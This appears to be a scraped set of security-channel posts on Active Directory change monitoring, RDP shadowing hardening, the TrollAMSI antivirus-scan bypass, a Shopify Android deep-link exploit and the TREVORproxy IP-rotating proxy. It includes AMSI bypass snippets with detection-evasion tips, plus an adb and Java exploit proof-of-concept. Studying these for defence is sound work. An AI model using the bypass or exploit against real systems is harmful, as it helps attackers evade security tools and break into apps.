Security Analysis
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, ThreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Parameters
- DC - domain controller FQDN.
- Formatlist - output in a list instead of a table.
- ExcludelastLogonTimestamp - exclude lastLogonTimestamp events from output.
- DumpAllObjects - dump all of Active Directory before start. In case of changes it will show you all previous values. But in large domains use it at your own risk (time and resource consuming).
- Short - output will contain only AttributeName, AttributeValue, LastOriginChangeTime and Explanation.
- Output - create an XML file with all output.
- ExcludeObjectGUID - exclude the Active Directory object with a specific GUID.
- Sleep - time interval between requests for the USN number. By default - 30 seconds.
- USN - specify the starting USN.
- DisplayXML - display a previously captured XML file.
How to use
Domain computer: just run the module in a PowerShell session as a domain user. For better performance use the domain controller FQDN instead of an IP address.
Non-domain computer: start a PowerShell session as a domain user with runas. Check that the domain controller is accessible. For better performance use the domain controller FQDN instead of an IP address.
#RedTeam #BlueTeam @securation
Monitor changes in Active Directory with replication metadata - DrunkF0x/ADSpider
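The technique the post describes (watch a DC's USN counter, then read replication metadata for whatever changed) can be reproduced in a few lines of PowerShell. The script below is an added example, not ADSpider's own code: it assumes the RSAT ActiveDirectory module, a domain user session, and a reachable DC FQDN, and it borrows the post's parameter names (-DC, -Sleep, -USN, -ExcludeLastLogonTimestamp) as hypothetical switches of its own.

```powershell
# Added example, not ADSpider's own code: poll one DC's highestCommittedUSN and print the
# replication metadata of every attribute written on that DC since the previous poll.
# Assumes the RSAT ActiveDirectory module and a domain user session; -DC is the DC's FQDN.
param(
    [Parameter(Mandatory = $true)][string]$DC,
    [int]$Sleep = 30,                        # seconds between USN polls, as in the post
    [long]$USN = 0,                          # 0 = start from the DC's current USN
    [switch]$ExcludeLastLogonTimestamp
)
Import-Module ActiveDirectory -ErrorAction Stop

# Bookkeeping attributes that change on every write and are rarely worth reporting
$noisy = @('uSNChanged', 'whenChanged', 'dSCorePropagationData')
if ($ExcludeLastLogonTimestamp) { $noisy += 'lastLogonTimestamp' }

# USNs are per-DC counters, so the watermark is only meaningful against this one DC
$lastUsn = if ($USN -gt 0) { $USN } else { [long](Get-ADRootDSE -Server $DC).highestCommittedUSN }
Write-Host "Watching $DC from USN $lastUsn (poll every $Sleep s)"

while ($true) {
    Start-Sleep -Seconds $Sleep
    $currentUsn = [long](Get-ADRootDSE -Server $DC).highestCommittedUSN
    if ($currentUsn -le $lastUsn) { continue }      # nothing committed on this DC since last poll

    # Objects whose uSNChanged on this DC moved past the watermark
    $changed = Get-ADObject -Server $DC -Filter "uSNChanged -gt $lastUsn" -Properties uSNChanged
    foreach ($obj in $changed) {
        # LocalChangeUsn is this DC's USN for the write; LastOriginatingChange* tells you on which
        # DC and at what time the change really originated, which is the point of using metadata
        Get-ADReplicationAttributeMetadata -Server $DC -Object $obj.DistinguishedName -ShowAllLinkedValues |
            Where-Object { $_.LocalChangeUsn -gt $lastUsn -and $_.AttributeName -notin $noisy } |
            Select-Object @{n = 'Object'; e = { $obj.DistinguishedName }}, AttributeName, AttributeValue,
                          LastOriginatingChangeTime, LastOriginatingChangeDirectoryServerIdentity, Version |
            Format-Table -AutoSize
    }
    $lastUsn = $currentUsn
}
```

Because the watermark is a single DC's USN, point the script at one DC and keep it there; switching servers between polls (or using a load-balanced name) gives you an unrelated counter and either floods or silences the output, which is also why the post recommends a DC FQDN over an IP address.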
There is a low detection surface:
- statically: because the code profile is so short and it is hard to apply a signature on any part of the common .NET functionality used
- dynamically: because of the lack of hooked win32 API calls, and because we are modifying JIT/IL memory, which is hard for AV/EDR to monitor or has not been monitored at this point by a lot of vendors
! For some security products, modify method M to pass in an empty argument string c.
! For the CSHARP example: private static int M(string c, string s) { c = ""; return 1; }
! For the POWERSHELL example: class TrollAMSI{static [int] M([string]$c, [string]$s){ $c = ""; return 1}}
! Refer to TrollAMSIdotnet for the AMSI bypass for Assembly.Load()
Benefits
- No P/Invoke or win32 API calls used such as VirtualProtect, hence more opsec safe
- No amsi.dll patching or byte patching for that matter
Some OpSec points worth noting follow:
STATIC: obfuscate "AmsiUtils" and "ScanContent" maybe?
DYNAMIC: Nothing much really. Note that the Add-Type method will leave disk artifacts, whereas hosting the compiled DLL on a webserver and using Load() is completely in memory.
https://github.com/cybersectroll/TrollAMSI/tree/main
#RedTeam #AMSI @securation
Learn about the Windows authentication protocols that are used within the Security Support Provider Interface (SSPI) architecture.
An alert should be raised whenever HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services is created or modified. To harden it, the following measures can be noted:
- To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching.
- In the group policy, one can explicitly set the Shadow setting to require the user's consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking.
- The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again.
#RedTeam #RDP @securation
How to spy on users on remote computers making only use of Windows' built-in functionality? This post will explain the steps to (ab)use Windows' Remote Desktop feature to view a remote user's desktop using native Windows functionality without them noticing it.
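A read-only audit of the two controls the post names, the Shadow policy value and WINSTATION_SHADOW in Win32_TSAccount, as an added example that is not part of the post or the linked article. It assumes the value meanings of the "Set rules for remote control of Remote Desktop Services user sessions" policy, and the 0x10 bit for WINSTATION_SHADOW is taken from the Win32_TSAccount documentation as I recall it and should be verified before you rely on it.

```powershell
# Added example (not from the original post): read-only audit of RDP shadowing controls.
# Run in an elevated PowerShell session on the host being checked.

# 1. The Shadow policy value under the Terminal Services policy key the post says to alert on.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
# Meaning of each value per the "Set rules for remote control of RDS user sessions" GPO setting
$shadowMeaning = @{
    0 = 'No remote control allowed'
    1 = 'Full control, user consent required'
    2 = 'Full control, NO consent required (silent shadowing possible)'
    3 = 'View only, user consent required'
    4 = 'View only, NO consent required (silent shadowing possible)'
}
$shadow = (Get-ItemProperty -Path $policyKey -Name Shadow -ErrorAction SilentlyContinue).Shadow
if ($null -eq $shadow) {
    Write-Output '[INFO] Shadow policy value not set; consider explicitly setting 1 or 3 (consent required)'
} elseif ($shadowMeaning.ContainsKey([int]$shadow)) {
    $flag = if ([int]$shadow -in 2, 4) { 'WARNING' } else { 'OK' }
    Write-Output ('[{0}] Shadow = {1}: {2}' -f $flag, $shadow, $shadowMeaning[[int]$shadow])
} else {
    Write-Output ('[WARNING] Shadow = {0}: unexpected value, investigate' -f $shadow)
}

# 2. Which accounts hold WINSTATION_SHADOW on each RDP listener.
# Assumption: WINSTATION_SHADOW is bit 0x10 of PermissionsAllowed (verify against the Win32_TSAccount docs).
$WINSTATION_SHADOW = 0x10
Get-CimInstance -Namespace 'root\CIMV2\TerminalServices' -ClassName Win32_TSAccount |
    Where-Object { ($_.PermissionsAllowed -band $WINSTATION_SHADOW) -ne 0 } |
    Select-Object TerminalName, AccountName, PermissionsAllowed |
    Format-Table -AutoSize
```

Alerting on changes to the key itself is a job for a registry SACL plus object-access auditing (Windows event 4657 records a modified registry value once auditing is on), not for this script; the script only tells you the current state so you can compare it with the policy you intended to apply.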
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'
Exploit using Java Code:
import android.content.Intent;
import android.net.Uri;

// Same intent as the adb command above, built from app code; startActivity needs an Activity context
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products"));
startActivity(intent);
https://hackerone.com/reports/637194
#Android
@Securation
TREVORproxy has two modes of operation: a Subnet Proxy and an SSH Proxy.
- Subnet Proxy mode uses the AnyIP feature of the Linux kernel to assign an entire subnet to your network interface, and give every connection a random source IP address from that subnet. E.g. if your cloud provider gives you a /64 IPv6 range, you can send your traffic from over eighteen quintillion (18,446,744,073,709,551,616) unique IP addresses.
- SSH Proxy mode combines iptables with SSH's SOCKS proxy feature (ssh -D) to round-robin packets through remote systems (cloud VMs, etc.)
NOTE: TREVORproxy is not intended as a DoS tool, as it does not "spoof" packets. It is a fully-functioning SOCKS proxy, meaning that it is designed to accept return traffic.
#RedTeam #OpSec @securation
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses! - blacklanternsecurity/TR...